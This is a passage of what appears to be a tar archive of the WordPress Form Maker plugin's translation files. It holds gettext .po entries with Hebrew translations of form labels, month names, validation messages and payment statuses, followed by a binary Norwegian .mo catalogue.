#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Select a Field"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Select a Date"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-he_IL.po000060400000057367152434416630012200 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:56+0400\n"
"PO-Revision-Date: 2015-05-22 16:56+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: he\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "כתובת רחוב"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "רחוב שורת כתובת 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "עיר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "אזור / מדינה / אזור"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "מיקוד / מיקוד"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "ארץ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "ינואר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "פברואר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "מרץ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "אפריל"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "מאי"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "יוני"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "יולי"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "אוגוסט"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "ספטמבר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "אוקטובר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "נובמבר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "דצמבר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "שגיאה, קוד אבטחה שגוי."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "IP שלך הוא ברשימה שחורה. אנא צור קשר עם מנהל האתר. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "הקובץ חורג מהגודל המותר"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "מצטערים, אינך רשאי להעלות קובץ מסוג זה."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "שגיאה, הקובץ לא ניתן להעביר."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "שדה %s דורשת כניסה ייחודית ערך זה הוגשה כבר."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "שגיאה, דואר אלקטרוני לא נשלח."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "שום דבר לא הוגשה."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "הטופס נשלח בהצלחה."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "שגיאה, דואר אלקטרוני לא נשלח."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "כתובת הדוא\"ל שלך כבר מאומתת."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "הדואר האלקטרוני שלך אומת בהצלחה."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "אימות דוא\"ל שלך נגמרת זמן."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "קישור אימות אינו חוקי."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "שדה חובה."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "זו אינה כתובת דאל חוקית."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "אתה לא יכול לבחור את התאריכים לשעבר. בחר תאריך החל מנוכחי."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "ערך חייב להיות בין"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "כמות "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "הציון שלך צריך להיות פחות מ"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "כותרת"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "ראשון"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "אחרון"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "אמצעי"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "קידומת"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "מס' טלפון:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "דולרים"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "סנט"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "מן "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "אל"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "ללכת "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "איפוס "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "בחר שדה "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "בחר תאריך"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-nb_NO.mo000060400000007065152434416630012176 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
V
]
b
e
j
s
z
�
�
�
�
�
�
�
�
�
�
)2
:H	\
ft
�	�:����.C?&��� �E�(
D
!d
�
?�
&�
4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:01+0400
PO-Revision-Date: 2015-05-22 17:02+0400
Last-Translator: 
Language-Team: 
Language: nb
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
